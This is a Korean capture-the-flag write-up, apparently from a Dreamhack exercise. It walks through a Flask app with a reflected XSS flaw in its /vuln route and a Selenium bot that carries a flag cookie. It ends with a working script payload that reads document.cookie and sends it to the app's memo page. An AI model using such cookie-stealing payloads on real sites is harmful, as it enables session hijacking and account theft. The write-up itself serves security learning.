1. 문제 설명
본 문제는 파이썬 Flask 프레임워크를 통해 구현되었다. 해당 문제는 XSS를 통해 다른 이용자의 쿠키를 탈취해야 하기 때문에, 다른 이용자가 방문하는 시나리오가 필요햐다. 이러한 기능은 셀레늄을 통해 구현하였다. 셀레늄(Selenium)은 웹 애플리케이션 자동화 및 테스트를 위한 포터블 프레임워크이다.
2. 문제 파악
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
return param
param = request.args.get("param", "")는 request 객체에서 URL에 포함된 쿼리스트링 파라미터를 가져오는 방법이다.
->@app.route("/vuln")에 method가 따로 명시되지 않았다. 이런 경우는 GET 요청만 처리한다.
-> request.args는 Flask에서 제공하는 객체로, URL에 포함된 쿼리 파라미터(GET)를 가져오는 딕셔너리 형태의 객체이다.
-> request.args.get("param", "")에서 "param"은 가져오려는 파라미터의 이름을 의미하고, ""는 기본값을 의미한다. 사용자가 URL에서 param 파라미터를 제공하지 않았을 경우, 기본값으로 ""를 반환한다.
-> 예를 들어, " http://127.0.0.1:8000/vuln?param=test "라고 요청하면, param의 값이 test이므로 request.args.get("param", "")는 test를 반환한다.
-> " http://127.0.0.1:8000/vuln "의 경우에는 param가 제공되지 않았으므로 빈 문자열 ""를 반환한다.
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
-> method에 GET과 POST가 있다. 여기서는 두 메서드 모두 처리한다.
-> 사용자가 /flag에 접근하면, 브라우저에서 자동으로 GET 요청이 발생한다. 그러면 if request.method == "GET" 조건이 만족되면서 flag.html이 시각화된다.
-> 사용자가 폼을 제출하면, 용량이 크기 때문에 해당 데이터는 POST 방식으로 서버에 전송된다. 그러면 이번에는 elif request.method == "POST" 조건이 만족되게 된다.
-> request.form은 POST 요청의 데이터를 딕셔너리 형태로 제공한다. request.form.get("param")은 사용자가 제출한 폼에서 param라는 필드의 값을 가져온다.
-> check_xss(param, {"name": "flag", "value": FLAG.strip()})
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
-> text = request.args.get("memo", "") 이용자가 전송한 memo 입력값을 가져온다 (GET을 통해)
-> return render_template("memo.html", memo=memo_text)는 사이트에 기록된 momo_text를 화면에 출력한다
+) GET 요청의 기본형 = request.args.get: GET 요청에서 서버로 데이터를 전송할 때는 주로 URL 쿼리스트링에 포함된 데이터를 사용한다.
+) POST 요청의 기본형 = request.form.get: POST 요청에서는 데이터가 body에 포함되어 서버로 전송된다.
2. 취약점 분석
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
return param
vuln(return param)과 memo(return render_template("memo.html", memo=memo_text)) 엔드포인트는 이용자의 입력값을 페이지에 출력한다.
memo의 경우 render_template 함수를 사용해 memo.html을 출력한다. render_template 함수는 전달된 템플릿 변수를 기록할 때 HTML 엔티티코드로 변환해 저장하기 때문에 XSS가 발생하지 않는다.
하지만 vuln은 이용자가 입력한 값을 페이지에 그대로 출력하기 때문에 XSS가 발생한다.
3. 익스플로잇
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
-> 127.0.0.1:8000을 대상으로 flag가 포함된 쿠키를 read_url()의 인자로 실행한다.
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
flag 페이지에서 POST 메서드 조건을 충족할 때, check_xss 함수를 호출하는 과정에서 쿠키값이 생성되는 것으로 보인다.
-> <script>alert("good");history.go(-1);</script> check_xss 함수가 성공하면 good 메시지를 띄우고 이전 페이지(go(-1))로 돌아간다.
<script>location.href='http://127.0.0.1:8000/memo?memo='+document.cookie</script>
해당 payload로 익스플로잇을 진행하면 된다.
vuln 페이지를 거쳐 memo 페이지에 document.cookie가 저장된다.
- location.href: 전체 URL을 반환하거나 URL을 업데이트할 수 있는 속성값이다.
- document.cookie: 해당 페이지에서 사용하는 쿠키를 읽고 쓰는 속성값이다.
<참고 자료>
[웹 앱프로그래밍] 파이썬 플라스크(Python Flask) 기본 구조와 HTTP Request - Wings on PC (tistory.com)
'Dreamhack' 카테고리의 다른 글
Web Hacking_ClientSide: CSRF (0) | 2024.09.22 |
---|---|
Web Hacking_Exercise: XSS - 2🚩 (0) | 2024.09.22 |
Web Hacking_ClientSide: XSS (0) | 2024.09.18 |
Web Hacking_Exercise: cookie & Session🚩 (1) | 2024.09.18 |
Web Hacking_Exercise: cookie🚩 (0) | 2024.09.17 |